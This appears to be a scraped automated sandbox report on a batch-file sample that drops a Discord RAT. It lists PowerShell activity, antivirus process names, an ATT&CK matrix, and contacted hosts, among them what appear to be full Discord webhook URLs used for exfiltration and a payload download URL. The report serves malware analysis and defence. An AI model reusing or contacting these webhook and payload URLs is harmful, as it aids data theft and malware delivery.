        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\NetSecurity\Microsoft.Windows.Firewall.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Contains functionality to disable the Task Manager (.Net Source)
        Source: exe.exe.32.dr, Program.cs.Net Code: DisableTaskManager
        Source: powershell.exe, 00000014.00000002.1961641784.00000224A5115000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bdagent.exe
        Source: powershell.exe, 00000014.00000002.1961641784.00000224A5115000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: avp.exe
        Source: explorer.exe, 00000017.00000002.2716909048.000000000BBCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Windows Defender\MSASCui.exe
        Source: powershell.exe, 00000014.00000002.1961641784.00000224A5115000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bdss.exe

        Stealing of Sensitive Information

        barindex
        Yara detected Discord Rat
        Source: Yara matchFile source: C:\Users\Public\Documents\Secret Document\exe.exe, type: DROPPED

        Remote Access Functionality

        barindex
        Yara detected Discord Rat
        Source: Yara matchFile source: C:\Users\Public\Documents\Secret Document\exe.exe, type: DROPPED

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information11
        Scripting        		Valid Accounts2
        Windows Management Instrumentation        		11
        Scripting        		12
        Process Injection        		11
        Masquerading        		OS Credential Dumping341
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		11
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts11
        Command and Scripting Interpreter        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Disable or Modify Tools        		LSASS Memory2
        Process Discovery        		Remote Desktop ProtocolData from Removable Media3
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        PowerShell        		Logon Script (Windows)Logon Script (Windows)151
        Virtualization/Sandbox Evasion        		Security Account Manager151
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture15
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets1
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Obfuscated Files or Information        		Cached Domain Credentials42
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Software Packing        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Timestomp        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        DLL Side-Loading        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526626 Sample: main.bat.bin.bat Startdate: 06/10/2024 Architecture: WINDOWS Score: 100 41 diva.ink 2->41 43 windowsupdatebg.s.llnwi.net 2->43 45 5 other IPs or domains 2->45 55 Antivirus detection for dropped file 2->55 57 Multi AV Scanner detection for dropped file 2->57 59 Yara detected Discord Rat 2->59 61 9 other signatures 2->61 9 cmd.exe 3 2->9         started        12 svchost.exe 2->12         started        signatures3 process4 signatures5 63 Suspicious powershell command line found 9->63 65 Obfuscated command line found 9->65 67 Tries to download and execute files (via powershell) 9->67 14 powershell.exe 22 9->14         started        18 powershell.exe 9->18         started        21 powershell.exe 33 9->21         started        23 16 other processes 9->23 process6 dnsIp7 37 C:\Users\user\AppData\...\l1mwkpcb.cmdline, Unicode 14->37 dropped 71 Powershell drops PE file 14->71 25 explorer.exe 14->25         started        28 csc.exe 3 14->28         started        47 diva.ink 185.199.108.153, 443, 64901 FASTLYUS Netherlands 18->47 39 C:\Users\Public\Documents\...\exe.exe, PE32+ 18->39 dropped 73 Loading BitLocker PowerShell Module 21->73 49 ptb.discord.com 162.159.128.233, 443, 64892, 64897 CLOUDFLARENETUS United States 23->49 51 discord.com 162.159.137.232, 443, 49707, 49710 CLOUDFLARENETUS United States 23->51 53 127.0.0.1 unknown unknown 23->53 31 net1.exe 1 23->31         started        file8 signatures9 process10 file11 69 Query firmware table information (likely to detect VMs) 25->69 35 C:\Users\user\AppData\Local\...\l1mwkpcb.dll, PE32 28->35 dropped 33 cvtres.exe 1 28->33         started        signatures12 process13

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        main.bat.bin.bat0%ReversingLabs
        main.bat.bin.bat3%VirustotalBrowse

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\Public\Documents\Secret Document\exe.exe100%AviraTR/Agent.lsgui
        C:\Users\Public\Documents\Secret Document\exe.exe100%Joe Sandbox ML
        C:\Users\Public\Documents\Secret Document\exe.exe70%ReversingLabsByteCode-MSIL.Trojan.DiscordRAT

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        bg.microsoft.map.fastly.net0%VirustotalBrowse
        ptb.discord.com1%VirustotalBrowse
        discord.com0%VirustotalBrowse
        windowsupdatebg.s.llnwi.net1%VirustotalBrowse
        api.msn.com0%VirustotalBrowse
        18.31.95.13.in-addr.arpa0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
        https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
        https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://oneget.orgX0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
        https://oneget.org0%URL Reputationsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT0%VirustotalBrowse
        http://ptb.discord.com1%VirustotalBrowse
        https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz0%VirustotalBrowse
        https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTz0%VirustotalBrowse
        https://ptb.discord.com/api/webhooks/129185140%VirustotalBrowse
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg0%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        bg.microsoft.map.fastly.net
        		199.232.210.172
        		truefalseunknown
        ptb.discord.com
        		162.159.128.233
        		truefalseunknown
        discord.com
        		162.159.137.232
        		truefalseunknown
        diva.ink
        		185.199.108.153
        		truetrue
          		unknown
          windowsupdatebg.s.llnwi.net
          		178.79.238.128
          		truefalseunknown
          18.31.95.13.in-addr.arpa
          		unknown
          		unknownfalseunknown
          api.msn.com
          		unknown
          		unknownfalseunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgzfalseunknown
          https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjdfalse
            		unknown
            https://diva.ink/exe.exetrue
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7Eucsc.exe, 0000000A.00000003.1488501089.0000013616791000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1488254269.000001361678C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1488419687.000001361678C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000002.1488742165.0000013616792000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                https://ptb.discpowershell.exe, 00000023.00000002.2398128595.000002D2C9C3A000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://ptb.discord.compowershell.exe, 00000023.00000002.2398128595.000002D2C9A75000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2705476793.00000000052BA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
